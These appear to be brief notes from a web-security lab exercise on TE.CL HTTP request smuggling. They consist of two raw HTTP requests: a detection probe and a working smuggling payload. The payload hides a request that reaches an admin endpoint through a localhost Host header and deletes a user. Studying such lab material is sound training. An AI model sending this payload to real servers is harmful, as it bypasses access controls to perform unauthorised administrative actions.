Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Analysis: 
(1)
POST / HTTP/1.1
Host: 0a56003d042f0cdf8096352000e40001.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Transfer-Encoding: chunked

3
abc
x

------------------> invalid(TE.CL)

(2)
POST / HTTP/1.1
Host: 0a56003d042f0cdf8096352000e40001.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

88
POST /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

---------------------